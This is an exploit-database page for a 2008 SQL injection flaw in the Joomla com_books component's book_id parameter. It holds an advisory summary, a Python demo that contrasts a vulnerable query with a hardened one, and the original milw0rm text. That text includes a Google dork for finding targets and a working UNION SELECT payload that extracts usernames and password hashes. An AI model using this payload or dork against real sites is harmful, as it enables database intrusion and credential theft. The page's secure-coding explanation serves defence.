Vendor: com_books
By: boom3rang
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: com_books
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2008

Joomla com_books(book_id) SQL injection Vulnerability

A vulnerability in the Joomla com_books component allows an attacker to inject arbitrary SQL commands via the book_id parameter of the book_details task. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database, such as usernames and passwords. The vulnerability is caused by insufficient sanitization of user-supplied input: the book_id value is placed into the SQL query without being validated as an integer.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL queries.
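The following added example (written for this page, not code from the com_books component or from the advisory author) shows the flawed pattern the advisory describes next to its hardened form. It uses an in-memory SQLite database with constructed jos_books and jos_users tables, since the real component's schema is not on the page; the payload is the advisory's book_id value rewritten in SQLite syntax so the demonstration runs offline. The hardened lookup does what the mitigation asks for: it rejects any book_id that is not a plain integer and passes the value as a bound parameter instead of concatenating it into the query text. In a real Joomla 1.5-era component the equivalent first step is to read the parameter through an integer-casting request getter such as JRequest::getInt rather than using the raw request value.

```python
import sqlite3

# Constructed stand-in for the two tables the advisory touches. The real
# com_books schema is not on the page, so the column layout is an assumption;
# jos_users is the Joomla users table that the advisory's payload reads from.
SCHEMA = """
CREATE TABLE jos_books (id INTEGER PRIMARY KEY, title TEXT, author TEXT);
CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO jos_books VALUES (1, 'Secure Coding', 'A. Author');
INSERT INTO jos_users VALUES (62, 'admin', 'hash-placeholder');
"""

# The advisory's book_id value, rewritten for SQLite (|| instead of concat()
# and three columns to match the constructed jos_books table).
DEMO_PAYLOAD = "-9999 UNION SELECT 1, username || ':' || password, 3 FROM jos_users"


def open_demo_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, book_id):
    """The flaw the advisory describes: the raw request parameter is spliced
    into the SQL text, so everything after the number is executed as SQL."""
    sql = "SELECT id, title, author FROM jos_books WHERE id = " + book_id
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, book_id):
    """Fix: reject anything that is not a plain integer, then bind the value
    as a query parameter so the driver never treats it as SQL."""
    if not book_id.isdecimal():
        raise ValueError("book_id must be a non-negative integer")
    sql = "SELECT id, title, author FROM jos_books WHERE id = ?"
    return conn.execute(sql, (int(book_id),)).fetchall()


def demo():
    """Run both lookups against a legitimate id and against DEMO_PAYLOAD."""
    conn = open_demo_db()
    results = {
        "vulnerable_legit": vulnerable_lookup(conn, "1"),
        "vulnerable_payload": vulnerable_lookup(conn, DEMO_PAYLOAD),
        "hardened_legit": hardened_lookup(conn, "1"),
    }
    try:
        hardened_lookup(conn, DEMO_PAYLOAD)
        results["hardened_payload"] = "executed"
    except ValueError as exc:
        results["hardened_payload"] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running the block shows the vulnerable lookup returning a jos_users row for the payload (the information disclosure the description mentions) while the hardened lookup raises before any query runs; the integer check matters even with bound parameters, because it also gives the application a clean place to log and reject malformed requests.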

Exploit-DB raw data:

#######################################################
Joomla com_books(book_id) SQL injection Vulnerability
#######################################################


###################################################
#[~] Author :  boom3rang 
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.

#[!] Module_Name:  com_books
#[!] Script_Name:  Joomla
#[!] Google_Dork:  inurl:"com_books"
##################################################

#[~] Example:  
http://localhost/Path/index.php?option=com_books&task=book_details&book_id=[exploit]


#[~]Exploit:  
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]